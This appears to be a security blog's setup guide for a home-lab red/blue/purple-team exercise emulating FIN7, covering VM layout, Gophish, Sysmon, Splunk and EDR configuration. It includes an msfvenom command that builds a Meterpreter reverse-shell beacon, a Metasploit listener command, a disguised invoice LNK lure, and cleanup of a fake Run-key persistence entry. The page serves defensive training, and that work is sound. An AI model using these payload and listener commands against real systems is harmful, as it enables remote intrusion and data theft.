top of page
Search

02-Endpoint-Threat-Detection: Setup-Guide

  • Writer: TrilloSec
    TrilloSec
  • Feb 23
  • 4 min read

ree

1️⃣ Lab Overview

Purpose

This experiment will evaluate the ability to detect, analyze, and respond to a simulated cyber attack inspired by real-world APTs. It will demonstrate hands-on cybersecurity skills in a home lab, focusing on professional-grade reporting (Red Team, Blue Team, Purple Team) while navigating real-world technical constraints.


APT Overview: This simulation will be inspired by FIN7 (aka Carbanak, Navigator Group, Anunak)—a financially motivated APT known for targeting financial institutions, retail, and hospitality sectors. FIN7’s attacks will be emulated by leveraging spear-phishing, Living-off-the-Land (LOTL) techniques, and fileless malware to evade detection and achieve long-term persistence. The group has been linked to over $1 billion in stolen funds through tactics such as POS system breaches, credential theft, and custom C2 frameworks. Despite law enforcement action, FIN7 remains highly active and continues to evolve its methods.


Red Team Overview: The Red Team will simulate FIN7’s initial access and execution tactics by crafting a malicious LNK file disguised as a financial document. Upon execution, the payload will leverage PowerShell and LOLBins (mshta.exe, rundll32.exe) to bypass defenses and establish a C2 connection via Meterpreter. The attack chain will include registry-based persistence and simulated end-stage actions to demonstrate the group's emphasis on stealth, persistence, and financial data theft.


Blue Team Overview: The Blue Team will focus on detecting and mitigating FIN7’s techniques using a combination of Sysmon, LimaCharlie EDR, and Splunk ES. Defensive efforts will include process creation monitoring, registry modification alerts, and network connection detections. Baseline assessments are expected to reveal detection gaps for payload execution and persistence mechanisms. Subsequent improvements will aim to achieve sub-minute detection times, enhance C2 communication visibility, and increase containment rates, improving the organization’s overall security posture.


Purple Team Overview: The Purple Team will integrate findings from the Red and Blue Team efforts to assess security effectiveness and refine defensive strategies. Key objectives will include quantifying phishing success rates, measuring detection rule efficiency, and identifying security gaps requiring further mitigation. Results will be documented in a structured format tailored for CISO-level decision-making, ensuring actionable insights while considering the practical constraints of a home lab environment.


  • Objective: Simulate an endpoint threat detection scenario inspired by the FIN7 APT group, focusing on initial access, execution, and persistence.

  • Tools Used:

    • 🟥 Red Team: Metasploit, MSFvenom, Gophish, Sliver, Empire, custom payloads

    • 🔵 Blue Team: Sysmon, LimaCharlie EDR, Splunk ES, YARA, Sigma

    • 🟣 Purple Team: MITRE ATT&CK Navigator, Splunk, Sigma converters, detection engineering scripts



2️⃣ Lab Environment Setup

2.1 Virtual Machines

VM Name

OS

Purpose

Tools Installed

red-c2-kali

Kali Linux Rolling

Red Team Attack Box

Metasploit, Sliver, Empire, Gophish

red-dev-shiva

Windows 10

Red Team Payload Development

PowerShell, Notepad

blue-edr-bob

Windows 10/11 Pro

Blue Team Endpoint (Target Workstation)

Sysmon, Splunk UF, LimaCharlie EDR

blue-siem-hermes

Ubuntu Desktop 22.04 LTS

SIEM & Log Collection

Splunk ES, Sigma

blue-soc-artemis

Ubuntu Desktop 22.04 LTS

SOC Analyst Workstation (Threat Hunting)

Sigma, YARA, Wireshark

💡 Notes:

  • Host: macOS running Parallels with 2.4 GHz 8-Core Intel i9, 64 GB RAM, and 2 TB SSD.

  • Splunk VM requires 16GB RAM minimum due to log processing load.

  • Adjust resource allocation if the host machine slows down.



3️⃣ Red Team Setup

3.1 Install & Configure Gophish (Phishing Simulation)

# On red-c2-kali:
sudo apt update && sudo apt install gophish
./gophish

3.2 Payload Generation

Create LNK Payload on red-dev-shiva:

notepad lnk_creator.ps1
# (Insert script from project workbook)

  • Move Fake_Invoice_2024.pdf.lnk to Kali and compress:

zip bait.zip Fake_Invoice_2024.pdf.lnk

Generate Reverse Shell with MSFvenom:

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.26.0.9 LPORT=443 -f exe -o kevin_beacon.exe

Start Metasploit Listener:

msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter_reverse_https; set LHOST 10.26.0.9; set LPORT 443; exploit -j"


4️⃣ Blue Team Setup

4.1 Sysmon Configuration on blue-edr-bob

sysmon -accepteula -i sysmon-config.xml

  • Enable monitoring for:

    • Process Creation (Event ID 1)

    • Registry Modifications (Event ID 13)

    • Network Connections (Event ID 3)

4.2 Splunk Setup on blue-siem-hermes

sudo /opt/splunk/bin/splunk start

  • Create indices: sysmon_logs, edr_logs

  • Install Splunk Universal Forwarder on Bob:

splunkforwarder.exe install
splunkforwarder.exe add monitor "C:\Windows\System32\winevt\Logs"

4.3 LimaCharlie EDR Setup

limacharlie enroll --sensor-id <sensor_id>
limacharlie rules add --file edr_rules.yaml


5️⃣ Testing the Attack

  1. Pre-Test Phase: Run initial attack without detection rules to gather baseline metrics.

  2. Deploy Blue Team Detection Rules:

    • Apply Sysmon XML rules.

    • Upload YARA and Sigma rules to Splunk and LimaCharlie.

  3. Post-Test Phase: Re-run the attack and measure detection improvements.



6️⃣ Expected Deliverables

Red Team Report: Attack vector details, payload development process, and execution logs.

Blue Team Report: Detection timelines, response actions, and log analysis results.

Purple Team Report: Combined analysis, measurable improvements, and risk reduction summary.



7️⃣ Cleanup & Reset

# On Kali
rm -rf /var/www/html/*

# On Bob (Windows)
Remove-Item -Path "C:\Users\Public\kevin_beacon.exe" -Force
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "AdobeFakeUpdate"

# On Splunk
splunk clean eventdata -f

  • Restore VM snapshots.

  • Archive all logs for future analysis.


📌 Notes & Adjustments

  • Future Work:

    • Automate detection with SOC playbooks.

    • Expand to include Network Threat Detection in future simulations.

  • Enhancements:

    • Add DNS logging and monitor lateral movement.

    • Implement SSL/TLS inspection for deeper C2 detection.




Other Reports in This Project

Red Team: Simulated a FIN7-inspired endpoint attack using LNK payloads, PowerShell execution, and C2 channels to test detection gaps.

Blue Team: Developed Sysmon, Splunk, and LimaCharlie EDR detection rules, reducing detection time to under 1 minute and containment to 5 minutes.

Purple Team: Quantified risk reduction of $58K per incident, aligned defenses with NIST 800-53, ISO 27001, and improved SOC response efficiency.

Setup Guide: Configured attack and defense environments with Gophish, Metasploit, Sysmon, and Splunk for consistent, repeatable testing.

©2025 by TrilloSec.com. All rights reserved.

bottom of page